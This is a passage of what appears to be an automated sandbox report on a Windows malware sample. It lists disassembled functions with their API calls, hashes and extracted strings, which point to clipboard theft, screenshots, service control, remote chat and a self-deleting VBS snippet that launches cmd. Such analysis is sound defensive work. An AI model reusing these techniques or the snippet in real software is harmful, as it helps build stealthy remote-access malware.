                                                                                                                                                                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 274C7D06
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C90D7
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C90E9
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C90FB
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C910D
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C911F
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9131
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9143
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9155
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9167
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C9179
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C918B
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C919D
                                                                                                                                                                      • Part of subcall function 274C90BA: _free.LIBCMT ref: 274C91AF
                                                                                                                                                                    • _free.LIBCMT ref: 274C7CFB
                                                                                                                                                                      • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
                                                                                                                                                                      • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
                                                                                                                                                                    • _free.LIBCMT ref: 274C7D1D
                                                                                                                                                                    • _free.LIBCMT ref: 274C7D32
                                                                                                                                                                    • _free.LIBCMT ref: 274C7D3D
                                                                                                                                                                    • _free.LIBCMT ref: 274C7D5F
                                                                                                                                                                    • _free.LIBCMT ref: 274C7D72
                                                                                                                                                                    • _free.LIBCMT ref: 274C7D80
                                                                                                                                                                    • _free.LIBCMT ref: 274C7D8B
                                                                                                                                                                    • _free.LIBCMT ref: 274C7DC3
                                                                                                                                                                    • _free.LIBCMT ref: 274C7DCA
                                                                                                                                                                    • _free.LIBCMT ref: 274C7DE7
                                                                                                                                                                    • _free.LIBCMT ref: 274C7DFF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                    • Opcode ID: b8d03fea1ebf82b6d20cc4d6b43cb571905f0049aa5a4f438ae9ba1464554811
                                                                                                                                                                    • Instruction ID: fd6a0ef050711d57c3c633b6d218a631521bda982b7952938f4091e218e73ab3
                                                                                                                                                                    • Opcode Fuzzy Hash: b8d03fea1ebf82b6d20cc4d6b43cb571905f0049aa5a4f438ae9ba1464554811
                                                                                                                                                                    • Instruction Fuzzy Hash: 68314F39600206EFEB23DB78D941FEBB7E9EF40651F20445DE968D7255DE31AA80C711
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041C6F3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041C726
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseEnumOpen
                                                                                                                                                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                                                                                                                                                    • API String ID: 1332880857-3730529168
                                                                                                                                                                    • Opcode ID: fe41e2c48cb5ed6e69364d887337216270dcb4f480170134fc4dfc7e7307ae20
                                                                                                                                                                    • Instruction ID: 30dd124696def6d144da0f01c12024620090e461f41beb3abd2b2340f2562d2c
                                                                                                                                                                    • Opcode Fuzzy Hash: fe41e2c48cb5ed6e69364d887337216270dcb4f480170134fc4dfc7e7307ae20
                                                                                                                                                                    • Instruction Fuzzy Hash: E961F3711082419AD325EF11D851EEFB3E8BF94309F10493FB589921A2FF789E49CA5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00419FB9
                                                                                                                                                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                                                    • API String ID: 489098229-1431523004
                                                                                                                                                                    • Opcode ID: 81710880b5fae4ed1c718bbdca35622b315e6849759b54d5d3668d4ccc3b285b
                                                                                                                                                                    • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 81710880b5fae4ed1c718bbdca35622b315e6849759b54d5d3668d4ccc3b285b
                                                                                                                                                                    • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                                                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                                                                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                                                                                                                                      • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                                                                                                                                      • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                    • API String ID: 1913171305-3159800282
                                                                                                                                                                    • Opcode ID: ae67ee83cbbb03383b3b129e7661274cc7e85276f6748a043389e50a88fb4ee3
                                                                                                                                                                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                                                                                                                    • Opcode Fuzzy Hash: ae67ee83cbbb03383b3b129e7661274cc7e85276f6748a043389e50a88fb4ee3
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                    • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                                                                                                                    • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                                                                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00455CEF
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00455D0C
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00455D15
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00455EB1
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                                                                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                                                                                                                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                                                                                                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free
                                                                                                                                                                    • String ID: \&G$\&G$`&G
                                                                                                                                                                    • API String ID: 269201875-253610517
                                                                                                                                                                    • Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                                                                                                                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                                                                                                                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 65535$udp
                                                                                                                                                                    • API String ID: 0-1267037602
                                                                                                                                                                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                                                                                                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                                                                                                                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                                                                                                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043A937
                                                                                                                                                                    • _free.LIBCMT ref: 0043A943
                                                                                                                                                                    • _free.LIBCMT ref: 0043A94A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2441525078-0
                                                                                                                                                                    • Opcode ID: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                                                                                                                                                                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                                                                                                                    • Opcode Fuzzy Hash: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                                                                                                                                                                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                    • API String ID: 2956720200-749203953
                                                                                                                                                                    • Opcode ID: e5a3953c4a163948a1cd32b3b5d17358191a241843256080b0eacdefc84b5fe3
                                                                                                                                                                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                                                                                                                    • Opcode Fuzzy Hash: e5a3953c4a163948a1cd32b3b5d17358191a241843256080b0eacdefc84b5fe3
                                                                                                                                                                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                                                                                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                                    • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                                                    • API String ID: 1704390241-2575729100
                                                                                                                                                                    • Opcode ID: c92f56b32030375566b7ec9392f9d96bbaf9532ed50e2dc3fe351fdc92585e77
                                                                                                                                                                    • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                                                                                                                    • Opcode Fuzzy Hash: c92f56b32030375566b7ec9392f9d96bbaf9532ed50e2dc3fe351fdc92585e77
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenClipboard.USER32 ref: 00416941
                                                                                                                                                                    • EmptyClipboard.USER32 ref: 0041694F
                                                                                                                                                                    • CloseClipboard.USER32 ref: 00416955
                                                                                                                                                                    • OpenClipboard.USER32 ref: 0041695C
                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                                                                                                    • CloseClipboard.USER32 ref: 00416984
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                    • String ID: !D@
                                                                                                                                                                    • API String ID: 2172192267-604454484
                                                                                                                                                                    • Opcode ID: 6c0241ba01bba564082e41971a7da4b3ac6ebb0ec3c87b2007e8fd540f0d8416
                                                                                                                                                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c0241ba01bba564082e41971a7da4b3ac6ebb0ec3c87b2007e8fd540f0d8416
                                                                                                                                                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
